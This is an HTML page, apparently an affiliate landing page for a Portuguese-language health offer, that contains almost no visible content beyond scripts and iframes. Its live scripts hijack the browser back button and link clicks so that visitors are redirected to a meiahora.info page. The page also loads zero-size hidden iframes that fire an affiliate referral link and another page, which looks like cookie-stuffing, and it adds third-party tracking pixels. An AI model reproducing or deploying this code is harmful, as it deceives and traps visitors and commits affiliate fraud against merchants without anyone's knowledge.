<head>



<script>
var sitesBack = ['https://saudemais12.meiahora.info/lbd-pv/revista-do-homem/'];
var paginaBack = sitesBack[Math.floor(Math.random() * sitesBack.length)];
history.pushState({}, "", location.href);
history.pushState({}, "", location.href);
window.onpopstate = function () {
setTimeout(function () {
location.href = paginaBack + window.location.search;
}, 1);
};
</script>


<script type="text/javascript">function blank(){
window.addEventListener('load', function() {
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
links[i].setAttribute('target','_blank');
}
});
}
blank();
function reload(){
window.addEventListener('load', function() {
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
links[i].onclick = function(){
setTimeout(function() {
location.href = 'https://saudemais12.meiahora.info/lbd-pv/revista-do-homem/';
},
300
);
}
}
});
}
reload();
</script>



<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MRQQXHW');</script>
<!-- End Google Tag Manager -->
</head>

<body>

  <!-- Google Tag Manager (noscript) -->
  <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MRQQXHW"
  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
  <!-- End Google Tag Manager (noscript) -->>


    <div style="display:none;"></div>

		<iframe src="https://saudemais12.meiahora.info/lbd-pv/globonews/womens-health/" height="100%" width="100%" noresize="noresize"></iframe>

        <script type="text/javascript">
var value = window.location.search.substring(1);
var theInstances = document.getElementsByTagName("a");
for (var i=0;i<theInstances.length;i++) {
var originalValue = theInstances[i];
var url = originalValue;
if( value != "" )
url = originalValue + "?" + value;
theInstances[i].setAttribute("href",url);
}
</script>

<iframe height="0" width="0" src="https://app.monetizze.com.br/r/AUE3902928?src=news"></iframe>

<iframe height="0" width="0" src="https://topdanet3.blogspot.com/2019/05/tb12-view-content.html"></iframe>

<script src="//my.rtmark.net/p.js?f=sync&lr=1&partner=c29c189b921f28e70d540955e9b7824633294b8b037e461f04bf7935b79974ac" defer></script>
<noscript><img src="//my.rtmark.net/img.gif?f=sync&lr=1&partner=c29c189b921f28e70d540955e9b7824633294b8b037e461f04bf7935b79974ac" width="1" height="1" /></noscript>

</body>
